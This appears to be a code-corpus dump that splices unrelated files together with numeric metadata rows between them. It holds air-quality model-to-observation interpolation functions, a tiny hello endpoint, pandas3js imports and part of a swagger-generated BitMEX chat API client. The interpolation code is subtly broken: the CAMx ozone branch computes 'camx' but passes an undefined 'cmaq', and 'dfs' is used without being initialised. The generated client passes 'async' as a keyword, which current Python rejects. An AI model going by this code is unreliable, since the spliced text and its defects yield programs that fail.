df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'WD':
if ('WDIR10' in model.keys):
print('Interpolating WD:')
df = g.get_group(i)
cmaq = model.get_var(lay=0, param='WDIR10')
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
df = concat(dfs)
df.dropna(subset=['Obs', 'model'], inplace=True)
return df
def combine_daily_aqs_cmaq(model, obs):
"""Short summary.
Parameters
----------
model : type
Description of parameter `model`.
obs : type
Description of parameter `obs`.
Returns
-------
type
Description of returned object.
"""
g = obs.d_df.groupby('Species')
comparelist = sort(obs.d_df.Species.unique())
for i in comparelist:
if (i == 'OZONE') and ('O3' in model.keys):
print('Interpolating Ozone:')
df = g.get_group(i)
fac = 1000.
cmaq = model.get_var(lay=0, param='O3').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL, daily=True)
df.Units = 'PPB'
print(df)
dfs.append(df)
elif i == 'PM2.5':
if ('PM25_TOT' in model.keys) | ('ASO4J' in model.keys):
print('Interpolating PM2.5:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='PM25', aqs_param=i)
cmaq = model.get_var(lay=0, param='PM25').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'CO':
if 'CO' in model.keys:
print('Interpolating CO:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='CO', aqs_param=i)
cmaq = model.get_var(lay=0, param='CO').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'NOY':
if 'NOY' in model.keys:
print('Interpolating NOY:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NOY', aqs_param=i)
cmaq = model.get_var(lay=0, param='NOY').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'SO2':
if 'SO2' in model.keys:
print('Interpolating SO2')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='SO2', aqs_param=i)
cmaq = model.get_var(lay=0, param='SO2').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'NOX':
if ('NO' in model.keys) & ('NO2' in model.keys):
print('Interpolating NOX:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NOX', aqs_param=i)
cmaq = model.get_var(lay=0, param='NOX').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'NO':
if ('NO' in model.keys):
print('Interpolating NO:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NO', aqs_param=i)
cmaq = model.get_var(lay=0, param='NO').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'NO2':
if ('NO2' in model.keys):
print('Interpolating NO2:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NO2', aqs_param=i)
cmaq = model.get_var(lay=0, param='NO2').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'SO4f':
if ('PM25_SO4' in model.keys) | ('ASO4J' in model.keys) | ('ASO4I' in model.keys):
print('Interpolating PSO4:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='SO4f', aqs_param=i)
cmaq = model.get_var(lay=0, param='SO4f').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'PM10':
if ('PM_TOTAL' in model.keys) | ('ASO4K' in model.keys):
print('Interpolating PM10:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='PM10', aqs_param=i)
cmaq = model.get_var(lay=0, param='PM10').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'NO3f':
if ('PM25_NO3' in model.keys) | ('ANO3J' in model.keys) | ('ANO3I' in model.keys):
print('Interpolating PNO3:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NO3f', aqs_param=i)
cmaq = model.get_var(lay=0, param='NO3F').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'ECf':
if ('PM25_EC' in model.keys) | ('AECI' in model.keys) | ('AECJ' in model.keys):
print('Interpolating PEC:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='ECf', aqs_param=i)
cmaq = model.get_var(lay=0, param='ECf').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'OCf':
if ('APOCJ' in model.keys):
print('Interpolating OCf:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df,
param='OCf', improve_param=i)
cmaqvar = model.get_var(lay=0, param='OC').compute() * fac
df = interpo.interp_to_pt_obs(cmaqvar, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'ETHANE':
if ('ETHA' in model.keys):
print('Interpolating Ethane:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='ETHA', aqs_param=i)
cmaq = model.get_var(lay=0, param='ETHA').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'BENZENE':
if ('BENZENE' in model.keys):
print('Interpolating BENZENE:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='BENZENE', aqs_param=i)
cmaq = model.get_var(lay=0, param='BENZENE').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'TOLUENE':
if ('TOL' in model.keys):
print('Interpolating Toluene:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='TOL', aqs_param=i)
cmaq = model.get_var(lay=0, param='TOL').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'ISOPRENE':
if ('ISOP' in model.keys):
print('Interpolating Isoprene:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='ISOP', aqs_param=i)
cmaq = model.get_var(lay=0, param='ISOP').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'O-XYLENE':
if ('XYL' in model.keys):
print('Interpolating Xylene')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='XYL', aqs_param=i)
cmaq = model.get_var(lay=0, param='XYL').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'WS':
if ('WSPD10' in model.keys):
print('Interpolating WS:')
df = g.get_group(i)
cmaq = model.get_var(lay=0, param='WSPD10')
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'TEMP':
if 'TEMP2' in model.keys:
print('Interpolating TEMP:')
df = g.get_group(i)
cmaq = model.get_var(lay=0, param='TEMP2')
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'WD':
if 'WDIR10' in model.keys:
print('Interpolating WD:')
df = g.get_group(i)
cmaq = model.get_var(lay=0, param='WDIR10')
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
df = concat(dfs)
df.loc[df.Obs < 0] = NaN
return df
def combine_daily_aqs_camx(model, obs):
"""Short summary.
Parameters
----------
model : type
Description of parameter `model`.
obs : type
Description of parameter `obs`.
Returns
-------
type
Description of returned object.
"""
g = obs.d_df.groupby('Species')
comparelist = sort(obs.d_df.Species.unique())
for i in comparelist:
if (i == 'OZONE') and ('O3' in model.keys):
print('Interpolating Ozone:')
df = g.get_group(i)
fac = 1000.
camx = model.get_var(lay=0, param='O3').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL, daily=True)
df.Units = 'PPB'
dfs.append(df)
elif i == 'PM2.5':
if ('PM25_TOT' in model.keys) | ('ASO4J' in model.keys):
print('Interpolating PM2.5:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='PM25', aqs_param=i)
cmaq = model.get_var(lay=0, param='PM25').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'CO':
if 'CO' in model.keys:
print('Interpolating CO:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='CO', aqs_param=i)
cmaq = model.get_var(lay=0, param='CO').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'NOY':
if 'NOY' in model.keys:
print('Interpolating NOY:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NOY', aqs_param=i)
cmaq = model.get_var(lay=0, param='NOY').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'SO2':
if 'SO2' in model.keys:
print('Interpolating SO2')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='SO2', aqs_param=i)
cmaq = model.get_var(lay=0, param='SO2').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'NOX':
if ('NO' in model.keys) | ('NO2' in model.keys):
print('Interpolating NOX:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NOX', aqs_param=i)
cmaq = model.get_var(lay=0, param='NOX').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'NO':
if ('NO' in model.keys):
print('Interpolating NO:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NO', aqs_param=i)
cmaq = model.get_var(lay=0, param='NO').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'NO2':
if ('NO2' in model.keys):
print('Interpolating NO2:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NO2', aqs_param=i)
cmaq = model.get_var(lay=0, param='NO2').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'SO4f':
if ('PM25_SO4' in model.keys) | ('ASO4J' in model.keys) | ('ASO4I' in model.keys):
print('Interpolating PSO4:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='SO4f', aqs_param=i)
cmaq = model.get_var(lay=0, param='SO4f').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'PM10':
if ('PM_TOTAL' in model.keys) | ('ASO4K' in model.keys):
print('Interpolating PM10:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='PM10', aqs_param=i)
cmaq = model.get_var(lay=0, param='PM10').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'NO3f':
if ('PM25_NO3' in model.keys) | ('ANO3J' in model.keys) | ('ANO3I' in model.keys):
print('Interpolating PNO3:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NO3f', aqs_param=i)
cmaq = model.get_var(lay=0, param='NO3F').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'ECf':
if ('PM25_EC' in model.keys) | ('AECI' in model.keys) | ('AECJ' in model.keys):
print('Interpolating PEC:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='ECf', aqs_param=i)
cmaq = model.get_var(lay=0, param='ECf').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'OCf':
if ('APOCJ' in model.keys):
print('Interpolating OCf:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df,
param='OCf', improve_param=i)
cmaqvar = model.get_var(lay=0, param='OC').compute() * fac
df = interpo.interp_to_pt_obs(cmaqvar, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'ETHANE':
if ('ETHA' in model.keys):
print('Interpolating Ethane:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='ETHA', aqs_param=i)
cmaq = model.get_var(lay=0, param='ETHA').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'BENZENE':
if ('BENZENE' in model.keys):
print('Interpolating BENZENE:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='BENZENE', aqs_param=i)
cmaq = model.get_var(lay=0, param='BENZENE').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'TOLUENE':
if ('TOL' in model.keys):
print('Interpolating Toluene:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='TOL', aqs_param=i)
cmaq = model.get_var(lay=0, param='TOL').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'ISOPRENE':
if ('ISOP' in model.keys):
print('Interpolating Isoprene:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='ISOP', aqs_param=i)
cmaq = model.get_var(lay=0, param='ISOP').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'O-XYLENE':
if ('XYL' in model.keys):
print('Interpolating Xylene')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='XYL', aqs_param=i)
cmaq = model.get_var(lay=0, param='XYL').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'WS':
if ('WSPD10' in model.keys):
print('Interpolating WS:')
df = g.get_group(i)
cmaq = model.get_var(lay=0, param='WSPD10')
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'TEMP':
if 'TEMP2' in model.keys:
print('Interpolating TEMP:')
df = g.get_group(i)
cmaq = model.get_var(lay=0, param='TEMP2')
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'WD':
if 'WDIR10' in model.keys:
print('Interpolating WD:')
df = g.get_group(i)
cmaq = model.get_var(lay=0, param='WDIR10')
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
df = concat(dfs)
df.loc[df.Obs < 0] = NaN
return df
def combine_tolnet_model(model, obs, param='O3', resample=False, freq='H'):
"""Short summary.
Parameters
----------
model : type
Description of parameter `model`.
obs : type
Description of parameter `obs`.
param : type
Description of parameter `param` (the default is 'O3').
resample : type
Description of parameter `resample` (the default is False).
freq : type
Description of parameter `freq` (the default is 'H').
Returns
-------
type
Description of returned object.
"""
# wont do to much. just interpolate the model to observations in the x y space
lat = obs.dset.Latitude
lon = obs.dset.Longitude
dset = find_nearest_latlon_xarray(model.dset[param], lat=lat, lon=lon, radius=model.dset.XCELL)
if resample:
dset = dset.resample(time=freq).mean()
tolnet = obs.dset.resample(time=freq).mean()
return dset, tolnet
| 49.827036 | 110 | 0.506167 | 7,001 | 59,344 | 4.160406 | 0.036281 | 0.028359 | 0.044563 | 0.036392 | 0.948227 | 0.939644 | 0.932022 | 0.930855 | 0.918461 | 0.916023 | 0 | 0.012732 | 0.371343 | 59,344 | 1,190 | 111 | 49.868908 | 0.768006 | 0.034005 | 0 | 0.870317 | 0 | 0 | 0.064791 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007685 | false | 0.013449 | 0.004803 | 0 | 0.019212 | 0.083573 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d73259d5a3734b7b24f6cb2994dda6a02091ea9f | 122 | py | Python | app_server/api/v1/hello/__init__.py | bmov/allround | 17a124eee94663e31d84155a6a3468fa06dcd5ef | [
"MIT"
] | null | null | null | app_server/api/v1/hello/__init__.py | bmov/allround | 17a124eee94663e31d84155a6a3468fa06dcd5ef | [
"MIT"
] | null | null | null | app_server/api/v1/hello/__init__.py | bmov/allround | 17a124eee94663e31d84155a6a3468fa06dcd5ef | [
"MIT"
] | null | null | null | from app_server.libs.render_json import render_json
def hello():
return render_json({}, message='hello from apiv1')
| 20.333333 | 54 | 0.754098 | 18 | 122 | 4.888889 | 0.666667 | 0.340909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009524 | 0.139344 | 122 | 5 | 55 | 24.4 | 0.828571 | 0 | 0 | 0 | 0 | 0 | 0.131148 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
d790394dbee11f75c6ca2def4499e1cdc5ec0e3a | 260 | py | Python | pandas3js/views/__init__.py | chrisjsewell/pandas3js | efdae29dd5c9c1236cb27a7bd809730106fad08d | [
"MIT"
] | 6 | 2017-06-07T19:51:39.000Z | 2020-07-19T00:16:12.000Z | pandas3js/views/__init__.py | chrisjsewell/pandas3js | efdae29dd5c9c1236cb27a7bd809730106fad08d | [
"MIT"
] | 15 | 2017-06-06T10:02:31.000Z | 2019-06-21T08:16:13.000Z | pandas3js/views/__init__.py | chrisjsewell/pandas3js | efdae29dd5c9c1236cb27a7bd809730106fad08d | [
"MIT"
] | null | null | null | #!/usr/bin/env python
from pandas3js.views.jsmesh import create_jsmesh_view, create_jslabelmesh_view
from pandas3js.views.jsrenderer import create_jsrenderer
from pandas3js.views.jsscene import create_js_scene_view
from pandas3js.views.jsgui import create_gui | 43.333333 | 78 | 0.873077 | 38 | 260 | 5.736842 | 0.473684 | 0.238532 | 0.330275 | 0.201835 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016598 | 0.073077 | 260 | 6 | 79 | 43.333333 | 0.887967 | 0.076923 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
ad077fc869fad875de2ccb5ea741278c7fc07b5c | 17,143 | py | Python | bitmex_swagger/api/chat_api.py | silencewwt/bitmex-swagger-client | 01403685eeb12eb27d53a0310d3bc7541793aa0f | [
"MIT"
] | 1 | 2018-08-04T15:05:43.000Z | 2018-08-04T15:05:43.000Z | bitmex_swagger/api/chat_api.py | silencewwt/bitmex-swagger | 01403685eeb12eb27d53a0310d3bc7541793aa0f | [
"MIT"
] | null | null | null | bitmex_swagger/api/chat_api.py | silencewwt/bitmex-swagger | 01403685eeb12eb27d53a0310d3bc7541793aa0f | [
"MIT"
] | null | null | null | # coding: utf-8
"""
BitMEX API
## REST API for the BitMEX Trading Platform [View Changelog](/app/apiChangelog) ---- #### Getting Started Base URI: [https://www.bitmex.com/api/v1](/api/v1) ##### Fetching Data All REST endpoints are documented below. You can try out any query right from this interface. Most table queries accept `count`, `start`, and `reverse` params. Set `reverse=true` to get rows newest-first. Additional documentation regarding filters, timestamps, and authentication is available in [the main API documentation](/app/restAPI). *All* table data is available via the [Websocket](/app/wsAPI). We highly recommend using the socket if you want to have the quickest possible data without being subject to ratelimits. ##### Return Types By default, all data is returned as JSON. Send `?_format=csv` to get CSV data or `?_format=xml` to get XML data. ##### Trade Data Queries *This is only a small subset of what is available, to get you started.* Fill in the parameters and click the `Try it out!` button to try any of these queries. * [Pricing Data](#!/Quote/Quote_get) * [Trade Data](#!/Trade/Trade_get) * [OrderBook Data](#!/OrderBook/OrderBook_getL2) * [Settlement Data](#!/Settlement/Settlement_get) * [Exchange Statistics](#!/Stats/Stats_history) Every function of the BitMEX.com platform is exposed here and documented. Many more functions are available. ##### Swagger Specification [⇩ Download Swagger JSON](swagger.json) ---- ## All API Endpoints Click to expand a section. # noqa: E501
OpenAPI spec version: 1.2.0
Contact: support@bitmex.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from bitmex_swagger.api_client import ApiClient
class ChatApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def chat_get(self, **kwargs): # noqa: E501
"""Get chat messages. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.chat_get(async=True)
>>> result = thread.get()
:param async bool
:param float count: Number of results to fetch.
:param float start: Starting ID for results.
:param bool reverse: If true, will sort results newest first.
:param float channel_id: Channel id. GET /chat/channels for ids. Leave blank for all.
:return: list[Chat]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.chat_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.chat_get_with_http_info(**kwargs) # noqa: E501
return data
def chat_get_with_http_info(self, **kwargs): # noqa: E501
"""Get chat messages. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.chat_get_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param float count: Number of results to fetch.
:param float start: Starting ID for results.
:param bool reverse: If true, will sort results newest first.
:param float channel_id: Channel id. GET /chat/channels for ids. Leave blank for all.
:return: list[Chat]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['count', 'start', 'reverse', 'channel_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method chat_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'count' in params:
query_params.append(('count', params['count'])) # noqa: E501
if 'start' in params:
query_params.append(('start', params['start'])) # noqa: E501
if 'reverse' in params:
query_params.append(('reverse', params['reverse'])) # noqa: E501
if 'channel_id' in params:
query_params.append(('channelID', params['channel_id'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/chat', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Chat]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def chat_get_channels(self, **kwargs): # noqa: E501
"""Get available channels. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.chat_get_channels(async=True)
>>> result = thread.get()
:param async bool
:return: list[ChatChannel]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.chat_get_channels_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.chat_get_channels_with_http_info(**kwargs) # noqa: E501
return data
def chat_get_channels_with_http_info(self, **kwargs): # noqa: E501
"""Get available channels. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.chat_get_channels_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:return: list[ChatChannel]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method chat_get_channels" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/chat/channels', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ChatChannel]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def chat_get_connected(self, **kwargs): # noqa: E501
"""Get connected users. # noqa: E501
Returns an array with browser users in the first position and API users (bots) in the second position. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.chat_get_connected(async=True)
>>> result = thread.get()
:param async bool
:return: ConnectedUsers
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.chat_get_connected_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.chat_get_connected_with_http_info(**kwargs) # noqa: E501
return data
def chat_get_connected_with_http_info(self, **kwargs): # noqa: E501
"""Get connected users. # noqa: E501
Returns an array with browser users in the first position and API users (bots) in the second position. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.chat_get_connected_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:return: ConnectedUsers
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method chat_get_connected" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/chat/connected', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ConnectedUsers', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
